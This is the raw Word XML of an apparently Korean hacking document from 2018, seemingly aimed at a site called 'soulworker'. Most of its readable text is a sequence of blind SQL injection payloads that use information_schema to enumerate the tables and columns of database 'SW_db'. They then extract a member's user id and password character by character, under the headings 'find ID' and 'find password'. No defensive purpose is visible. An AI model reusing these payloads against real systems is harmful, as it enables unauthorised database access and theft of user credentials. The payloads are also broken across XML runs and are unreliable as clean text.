      <w:r w:rsidR="00D64ADA">
        <w:t>bles wh</w:t>
      </w:r>
      <w:r w:rsidR="005B39A4">
        <w:t>ere table_schema=’</w:t>
      </w:r>
      <w:r w:rsidR="00D64ADA">
        <w:t>SW_</w:t>
      </w:r>
      <w:r w:rsidR="005B39A4">
        <w:t>db’ and table_type=’base table’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> order by table_name limit 1) as vtable order</w:t>
      </w:r>
      <w:r w:rsidR="00D64ADA">
        <w:t xml:space="preserve"> by table_name desc limit 1))=5%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64ADA" w:rsidRDefault="00D64ADA" w:rsidP="00D64ADA">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002127DA">
        <w:t>and substr((select table_name from (select table_name from information_schema.ta</w:t>
      </w:r>
      <w:r w:rsidR="00EE1384">
        <w:t>bles where table_schema='SW_db</w:t>
      </w:r>
      <w:r w:rsidRPr="002127DA">
        <w:t xml:space="preserve">' and table_type='base table' order by table_name limit 1) as vtable order by table_name </w:t>
      </w:r>
      <w:r w:rsidR="005B39A4">
        <w:t>desc limit 1), 1, 1)=char(0x42)%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8797F" w:rsidRDefault="00F8797F" w:rsidP="00F8797F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>(select table_name from (select table_name from information_schema.tables where table_schema=’SW_db’ and table_type=’base table’ order by table_name limit 1) as vtable order</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by table_name desc limit 1)=”board”</w:t>
      </w:r>
      <w:r>
        <w:t>%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B39A4" w:rsidRDefault="00F8797F" w:rsidP="00F8797F">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>컬럼</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001852F8" w:rsidRDefault="00F8797F" w:rsidP="00F8797F">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>and length((select column_name from (select column_name from information_schema.columns w</w:t>
      </w:r>
      <w:r>
        <w:t>here table_name='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>oard</w:t>
      </w:r>
      <w:r>
        <w:t>' order by column_name limit 1) as vtable order</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by column_name desc limit 1))=7%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8797F" w:rsidRDefault="00F8797F" w:rsidP="00F8797F">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>and substr((select column_name from (select column_name from information_schema.columns where table_name='greet' order by column_name limit 1) as vtable order by column_name desc limit 1),1,1)=char(0x4</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F8797F" w:rsidRDefault="00F8797F" w:rsidP="00F8797F">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(select column_name from (select column_name from information_schema.columns where table_name='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">oard' order by column_name limit 1) as vtable order </w:t>
      </w:r>
      <w:r>
        <w:t>by column_name desc limit 1)=”content”</w:t>
      </w:r>
      <w:r>
        <w:t>%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F42BE7" w:rsidRDefault="00F42BE7" w:rsidP="00F42BE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>아이디 찾기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F42BE7" w:rsidRDefault="00F42BE7" w:rsidP="00F42BE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="93345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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K-097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82550"/>
            <wp:effectExtent l="0" t="0" r="254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K-099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93345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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K-098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E7" w:rsidRDefault="00F42BE7" w:rsidP="00F42BE7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>and length((</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45582">
        <w:t>select id from (select id from member order by id limit 1) as vtable order by id desc limit 1</w:t>
      </w:r>
      <w:r>
        <w:t>))=6</w:t>
      </w:r>
      <w:r>
        <w:t>%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F42BE7" w:rsidRDefault="00F42BE7" w:rsidP="00F42BE7">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002127DA">
        <w:t>and substr((</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45582">
        <w:t>select id from (select id from member order by id limit 1) as vtable order by id desc limit 1</w:t>
      </w:r>
      <w:r>
        <w:t>), 1, 1)=char(0x42)%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F42BE7" w:rsidRDefault="00F42BE7" w:rsidP="00F42BE7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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45582">
        <w:t>select id from (select id from member order by id limit 1) as vtable order by id desc limit 1</w:t>
      </w:r>
      <w:r>
        <w:t>)=”</w:t>
      </w:r>
      <w:r>
        <w:t>hacker</w:t>
      </w:r>
      <w:r>
        <w:t>”%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F42BE7" w:rsidRPr="00F42BE7" w:rsidRDefault="00F42BE7" w:rsidP="00F42BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00F42BE7" w:rsidRDefault="00662BAC" w:rsidP="00F42BE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>비밀번호 찾기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B820E4" w:rsidRDefault="00B820E4" w:rsidP="00F42B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19380"/>
            <wp:effectExtent l="0" t="0" r="254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K-102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AC" w:rsidRDefault="00662BAC" w:rsidP="00662BAC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>and length((</w:t>
      </w:r>
      <w:r w:rsidR="006241CA">
        <w:t>select pw from (select id,pw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from member order by id limit 1) as vtable order by id desc limit 1))=6%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00662BAC" w:rsidRDefault="00662BAC" w:rsidP="00662BAC">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002127DA">
        <w:t>and substr((</w:t>
      </w:r>
      <w:r w:rsidR="006241CA">
        <w:t>select pw from (select id,pw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from member order by id limit 1) as vtable order by id desc limit 1), 1, 1)=char(0x42)%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00662BAC" w:rsidRDefault="00662BAC" w:rsidP="00662BAC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>and (</w:t>
      </w:r>
      <w:r w:rsidR="006241CA">
        <w:t>select pass from (select id,pw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from member order by id limit 1) as vtable order by id desc limit 1)=”hacker”%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00662BAC" w:rsidRDefault="00662BAC" w:rsidP="00662BAC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>and length(</w:t>
      </w:r>
      <w:r w:rsidR="006241CA">
        <w:t>select pw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from member where id =</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="006241CA">
        <w:t>hacker</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>)=6%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00662BAC" w:rsidRDefault="00662BAC" w:rsidP="00662BAC">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002127DA">
        <w:t>and substr(</w:t>
      </w:r>
      <w:r w:rsidR="006241CA">
        <w:t>select pw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from member where id =”</w:t>
      </w:r>
      <w:r w:rsidR="006241CA">
        <w:t>hacker</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>), 1, 1)=char(0x42)%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00662BAC" w:rsidRDefault="00662BAC" w:rsidP="00662BAC">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>and (sel</w:t>
      </w:r>
      <w:r w:rsidR="006241CA">
        <w:t>ect pw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from member where id =”</w:t>
      </w:r>
      <w:r w:rsidR="006241CA">
        <w:t>hacker</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>)=”hacker”%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00662BAC" w:rsidRPr="00662BAC" w:rsidRDefault="00662BAC" w:rsidP="00F42BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00662BAC" w:rsidRPr="00662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E0" w:rsidRDefault="009977E0" w:rsidP="009977E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009977E0" w:rsidRDefault="009977E0" w:rsidP="0099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E0" w:rsidRDefault="009977E0" w:rsidP="009977E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009977E0" w:rsidRDefault="009977E0" w:rsidP="00997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20B1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF46585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65C6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF52AEE8"/>
    <w:lvl w:ilvl="0" w:tplc="799E445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8F4113"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="478AE14A"/>
    <w:lvl w:ilvl="0" w:tplc="22C07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A769EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE128B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0A7FCB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="523C208A"/>
    <w:lvl w:ilvl="0" w:tplc="B8D6845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AA6178"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F516EEFA"/>
    <w:lvl w:ilvl="0" w:tplc="C80E69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D6"/>
    <w:rsid w:val="00001604"/>
    <w:rsid w:val="0006372A"/>
    <w:rsid w:val="00071148"/>
    <w:rsid w:val="000808BE"/>
    <w:rsid w:val="000B03CD"/>
    <w:rsid w:val="000C2CA0"/>
    <w:rsid w:val="00173FE7"/>
    <w:rsid w:val="001852F8"/>
    <w:rsid w:val="00292BD1"/>
    <w:rsid w:val="002C6587"/>
    <w:rsid w:val="00437157"/>
    <w:rsid w:val="0054335D"/>
    <w:rsid w:val="005B39A4"/>
    <w:rsid w:val="006073D5"/>
    <w:rsid w:val="00612BFF"/>
    <w:rsid w:val="006241CA"/>
    <w:rsid w:val="006245DB"/>
    <w:rsid w:val="0063141B"/>
    <w:rsid w:val="006436C5"/>
    <w:rsid w:val="00662BAC"/>
    <w:rsid w:val="00695435"/>
    <w:rsid w:val="006B18DD"/>
    <w:rsid w:val="007B079D"/>
    <w:rsid w:val="00893330"/>
    <w:rsid w:val="008C378C"/>
    <w:rsid w:val="008F59BE"/>
    <w:rsid w:val="00977331"/>
    <w:rsid w:val="00992E34"/>
    <w:rsid w:val="009977E0"/>
    <w:rsid w:val="00B1169F"/>
    <w:rsid w:val="00B820E4"/>
    <w:rsid w:val="00B83A5F"/>
    <w:rsid w:val="00B97C4B"/>
    <w:rsid w:val="00BB6C09"/>
    <w:rsid w:val="00BD0E62"/>
    <w:rsid w:val="00D64ADA"/>
    <w:rsid w:val="00E108AE"/>
    <w:rsid w:val="00EA0B87"/>
    <w:rsid w:val="00EA43D6"/>
    <w:rsid w:val="00EE1384"/>
    <w:rsid w:val="00EF4A4F"/>
    <w:rsid w:val="00F247EF"/>
    <w:rsid w:val="00F42BE7"/>
    <w:rsid w:val="00F8797F"/>
    <w:rsid w:val="00FB186A"/>
    <w:rsid w:val="00FB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E32675-82C9-4682-8CBD-05087138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7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77E0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009977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77E0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009977E0"/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB6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ettings" Target="settings.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.soulworker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2018-06-22T00:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-25T05:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>